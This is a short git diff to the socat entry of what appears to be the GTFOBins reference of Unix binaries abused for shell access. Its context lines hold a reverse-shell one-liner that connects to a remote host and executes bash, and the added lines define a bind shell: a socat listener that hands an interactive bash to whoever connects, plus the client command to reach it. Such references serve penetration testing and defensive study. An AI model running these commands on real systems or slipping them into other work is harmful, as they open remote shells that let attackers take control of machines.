diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 19e5b7d..4c9a308 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -6,4 +6,9 @@ functions: RHOST=10.0.0.1 RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane + bind-shell: + - description: Run socat FILE:`tty`,raw,echo=0 TCP:10.0.0.2:12345 to connect to the shell on the other end. + code: | + LPORT=12345 + socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane --- \ No newline at end of file